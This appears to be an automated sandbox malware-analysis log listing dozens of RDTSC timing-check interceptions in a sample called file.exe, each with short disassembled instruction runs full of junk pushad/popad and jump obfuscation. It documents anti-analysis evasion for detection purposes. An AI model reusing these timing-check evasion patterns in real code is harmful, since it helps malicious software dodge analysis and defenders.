    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EE0B second address: 98EE64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jl 00007FDDACF47FE3h 0x00000010 jmp 00007FDDACF47FDDh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FDDACF47FD8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 movsx ebx, bx 0x00000034 mov dword ptr [ebp+1244BC60h], eax 0x0000003a push 00000000h 0x0000003c pushad 0x0000003d mov esi, 75A9BDC0h 0x00000042 stc 0x00000043 popad 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 js 00007FDDACF47FD6h 0x0000004e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992E3E second address: 992E48 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDACAD5292h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98ACF4 second address: 98ACFE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98ACFE second address: 98AD04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99446A second address: 994470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B74D second address: 98B758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B758 second address: 98B75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EF7D second address: 98EF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B2B3 second address: 99B2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDDACF47FD6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C287 second address: 99C291 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C291 second address: 99C295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998661 second address: 998680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FDDACAD5299h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9965F4 second address: 996620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDDACF47FE5h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D3C3 second address: 99D3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B54B second address: 99B56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FDEh 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDDACF47FDBh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D55C second address: 99D590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD5299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDDACAD528Fh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D590 second address: 99D594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D594 second address: 99D59A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D59A second address: 99D634 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDACF47FDCh 0x00000008 jnl 00007FDDACF47FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3511h], eax 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov edi, edx 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 or dword ptr [ebp+122D2724h], eax 0x0000002d mov eax, dword ptr [ebp+122D0E81h] 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FDDACF47FD8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d movzx ebx, bx 0x00000050 jns 00007FDDACF47FE2h 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007FDDACF47FD8h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 0000001Ch 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 mov dword ptr [ebp+1244023Bh], edx 0x00000078 push eax 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c jg 00007FDDACF47FD6h 0x00000082 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D634 second address: 99D638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D638 second address: 99D642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2DCA second address: 9A2DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2DD0 second address: 9A2DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE2h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6626 second address: 9A662F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A662F second address: 9A6646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6646 second address: 9A664A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABD62 second address: 9ABD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABD66 second address: 9ABD6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABD6A second address: 9ABD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B25B8 second address: 9B25BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2241 second address: 9B226B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDDACF47FDBh 0x00000010 pushad 0x00000011 jnp 00007FDDACF47FD6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B226B second address: 9B227E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDACAD528Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B23F8 second address: 9B241F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FDDACF47FDEh 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FDDACF47FDEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B241F second address: 9B242C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FDDACAD529Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B242C second address: 9B244C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE0h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FDDACF47FD6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B244C second address: 9B2450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982DCD second address: 982DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982EAA second address: 982EAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983232 second address: 983238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983532 second address: 983538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983538 second address: 983557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983557 second address: 98355D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98355D second address: 983562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983562 second address: 98356C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDDACAD5286h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9835A9 second address: 9835AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9836FC second address: 983700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983DBA second address: 983DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FDDACF47FD6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9840A6 second address: 9840AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9840AB second address: 9840B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9840B0 second address: 9685F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD528Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FDDACAD5288h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov ecx, dword ptr [ebp+122D29DEh] 0x0000002f call dword ptr [ebp+122D34FCh] 0x00000035 push eax 0x00000036 push edx 0x00000037 push edx 0x00000038 jmp 00007FDDACAD5299h 0x0000003d pushad 0x0000003e popad 0x0000003f pop edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9685F2 second address: 9685F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9835A5 second address: 9835A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B58B0 second address: 9B58B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B58B4 second address: 9B58BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B58BC second address: 9B58C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5B3A second address: 9B5B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5B3E second address: 9B5B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5B44 second address: 9B5B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5CD0 second address: 9B5CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5CD4 second address: 9B5CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B60C5 second address: 9B60C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDCC9 second address: 9BDCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jl 00007FDDACAD5286h 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDACAD528Eh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDE12 second address: 9BDE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDE16 second address: 9BDE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDF70 second address: 9BDF7E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDF7E second address: 9BDF9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDDACAD5294h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDF9C second address: 9BDFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE6h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDFB6 second address: 9BDFBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD9F8 second address: 9BDA02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDDACF47FD6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE6A8 second address: 9BE6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE6AE second address: 9BE6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEC35 second address: 9BEC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C72B0 second address: 9C72BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FDDACF47FD6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5D2B second address: 9C5D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948F72 second address: 948F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FDDACF47FE3h 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C63A4 second address: 9C63AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FDDACAD5286h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6670 second address: 9C6674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6929 second address: 9C692F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C692F second address: 9C6935 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6935 second address: 9C6940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6940 second address: 9C6972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e jmp 00007FDDACF47FDAh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDDACF47FDAh 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6C42 second address: 9C6C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD5297h 0x00000009 je 00007FDDACAD5286h 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6C64 second address: 9C6C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FDDACF47FE7h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9CC9 second address: 9C9CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE324 second address: 9CE33A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FDDACF47FE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE33A second address: 9CE340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE340 second address: 9CE349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE5A3 second address: 9CE5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4EC2 second address: 9D4ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4ED9 second address: 9D4EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDDACAD5296h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D51F5 second address: 9D5227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FDDACF47FD6h 0x00000009 jl 00007FDDACF47FD6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jo 00007FDDACF47FDEh 0x00000019 jp 00007FDDACF47FD6h 0x0000001f pushad 0x00000020 popad 0x00000021 je 00007FDDACF47FDCh 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5362 second address: 9D5368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D551E second address: 9D5533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007FDDACF47FE2h 0x0000000d jc 00007FDDACF47FDCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983A8A second address: 983A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983A8F second address: 983AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACF47FDBh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D598D second address: 9D5993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5993 second address: 9D59A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FDDACF47FE2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
